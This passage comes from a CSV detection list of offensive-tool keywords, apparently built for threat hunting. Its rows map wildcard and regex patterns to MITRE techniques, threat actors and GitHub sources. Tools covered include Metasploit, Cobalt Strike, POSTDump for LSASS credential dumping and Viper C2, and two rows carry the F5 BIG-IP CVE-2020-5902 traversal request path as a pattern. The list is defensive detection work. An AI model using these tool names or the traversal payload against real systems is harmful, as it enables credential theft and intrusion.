Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*POST */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileSave.jsp*",".{0,1000}POST\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileSave\.jsp.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*",".{0,1000}POST\s.{0,1000}fileName\=\/tmp\/1\.txt\&content\=CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*post/windows/gather*",".{0,1000}post\/windows\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*post/windows/gather/credentials/vnc*",".{0,1000}post\/windows\/gather\/credentials\/vnc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*post_breach_handler.py*",".{0,1000}post_breach_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*post_ex_amsi_disable*",".{0,1000}post_ex_amsi_disable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_keylogger*",".{0,1000}post_ex_keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_obfuscate*",".{0,1000}post_ex_obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Post_EX_Process_Name*",".{0,1000}Post_EX_Process_Name.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*post_ex_smartinject*",".{0,1000}post_ex_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_spawnto_x64*",".{0,1000}post_ex_spawnto_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_spawnto_x86*",".{0,1000}post_ex_spawnto_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*POST_EXPLOIT_DIR*",".{0,1000}POST_EXPLOIT_DIR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*post_exploitation.py*",".{0,1000}post_exploitation\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*POSTDump*PROCEXP.sys*",".{0,1000}POSTDump.{0,1000}PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump.csproj*",".{0,1000}POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","Another 
tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump.git*",".{0,1000}POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.ps1",".{0,1000}PostDump\.ps1","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*POSTDump\Postdump.cs*",".{0,1000}POSTDump\\Postdump\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential 
Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump\PROCEXP.sys*",".{0,1000}POSTDump\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*postgres_default_pass.txt*",".{0,1000}postgres_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*postgres_default_user.txt*",".{0,1000}postgres_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" 
"*POSTMiniDump.Utils*",".{0,1000}POSTMiniDump\.Utils.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostMulitDomainSpider.py*",".{0,1000}PostMulitDomainSpider\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostMulitMsfGetDomainInfoByBloodHound.py*",".{0,1000}PostMulitMsfGetDomainInfoByBloodHound\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewAddNetUser.py*",".{0,1000}PostPowershellPowerViewAddNetUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used 
in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetGroup.py*",".{0,1000}PostPowershellPowerViewGetNetGroup\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetGroupMember.py*",".{0,1000}PostPowershellPowerViewGetNetGroupMember\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetProcess.py*",".{0,1000}PostPowershellPowerViewGetNetProcess\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and 
technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewUserHunter.py*",".{0,1000}PostPowershellPowerViewUserHunter\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*postrequest/link.git*",".{0,1000}postrequest\/link\.git.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*PostRewMsfAuxiliaryCVE*.py*",".{0,1000}PostRewMsfAuxiliaryCVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostRewMsfExample.py*",".{0,1000}PostRewMsfExample\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostRewMsfPostConfInfos.py*",".{0,1000}PostRewMsfPostConfInfos\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PotatoAPI.Mode.DCOMRemote*",".{0,1000}PotatoAPI\.Mode\.DCOMRemote.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation 